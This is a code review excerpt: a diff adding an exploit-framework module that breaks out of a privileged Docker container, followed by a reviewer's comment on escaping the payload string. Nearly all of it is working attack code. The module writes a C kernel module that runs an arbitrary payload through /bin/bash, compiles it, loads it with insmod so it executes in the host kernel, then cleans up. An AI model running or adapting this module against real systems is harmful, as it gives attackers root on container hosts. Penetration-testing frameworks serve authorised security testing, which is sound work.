modules/exploits/linux/local/docker_privileged_container_kernel_escape.rb

```diff
@@ -0,0 +1,213 @@
+  end
+
+  def exploit
+    # Check that container directory is writable
+    if directory?(datastore['WritableContainerDir']) && !writable?(datastore['WritableContainerDir'])
+      fail_with(Failure::BadConfig, "#{datastore['WritableContainerDir']} is not writable")
+    end
+
+    # Checking that kernel module isnt already running
+    if kernel_modules.include?(datastore['KernelModuleName'])
+      fail_with(Failure::BadConfig, "#{datastore['KernelModuleName']} is already loaded into the kernel. You may need to remove it manually.")
+    end
+
+    # Creating source files
+    print_status('Creating files')
+    mkdir(datastore['WritableContainerDir']) unless directory?(datastore['WritableContainerDir'])
+    cd(datastore['WritableContainerDir'])
+    write_kernel_source(datastore['KernelModuleName'], payload.encoded)
+    write_makefile(datastore['KernelModuleName'])
+    register_files_for_cleanup([
+      "#{datastore['KernelModuleName']}.c",
+      'Makefile'
+    ])
+
+    # Making exploit
+    print_status('Making kernel module')
+    results = cmd_exec('make')
+    vprint_status('Make results')
+    vprint_line(results)
+    register_files_for_cleanup([
+      'Module.symvers',
+      'modules.order',
+      "#{datastore['KernelModuleName']}.mod",
+      "#{datastore['KernelModuleName']}.mod.c",
+      "#{datastore['KernelModuleName']}.mod.o",
+      "#{datastore['KernelModuleName']}.o"
+    ])
+
+    # Checking if kernel file exists
+    unless file_exist?("#{datastore['KernelModuleName']}.ko")
+      fail_with(Failure::PayloadFailed, 'Kernel file did not compile. Run with verbose to see make errors.')
+    end
+    print_good('Kernel module compiled successfully')
+
+    # Loading module and running exploit
+    print_status('Loading kernel module')
+    results = cmd_exec("insmod #{datastore['KernelModuleName']}.ko")
+    vprint_status('Insmod results')
+    vprint_line(results)
+
+    # Leave temporary directory
+    cd('/')
+  end
+
+  def cleanup
+    # Go to the working directory
+    cd(datastore['WritableContainerDir'])
+
+    # Attempt to remove kernel module
+    if kernel_modules.include?(datastore['KernelModuleName'])
+      vprint_status('Cleaning kernel module')
+      cmd_exec("rmmod #{datastore['KernelModuleName']}")
+    end
+
+    # Check that kernel module was removed
+    if kernel_modules.include?(datastore['KernelModuleName'])
+      print_warning('Payload was not a oneshot and cannot be removed until session is ended')
+      print_warning("Kernel module [#{datastore['KernelModuleName']}] will need to be removed manually")
+    end
+    cd('/')
+
+    super
+  end
+
+  def write_kernel_source(filename, payload_content)
+    file_content = %^
+#include<linux/init.h>
+#include<linux/module.h>
+#include<linux/kmod.h>
+
+MODULE_LICENSE("GPL");
+
+static int start_shell(void){
+char *argv[] ={"/bin/bash", "-c", "#{payload_content.gsub(/['"]/, '\\\\\0')}", NULL};
```

Comment:
You also need to escape the backslash character. A better way to do this may be to use the Rex library to define the C source:

```suggestion
static int start_shell(void){
#{ Rex::Text.to_c(payload_content, Rex::Text::DefaultWrap, 'command') #}
char *argv[] = {"/bin/bash", "-c", command, NULL};
```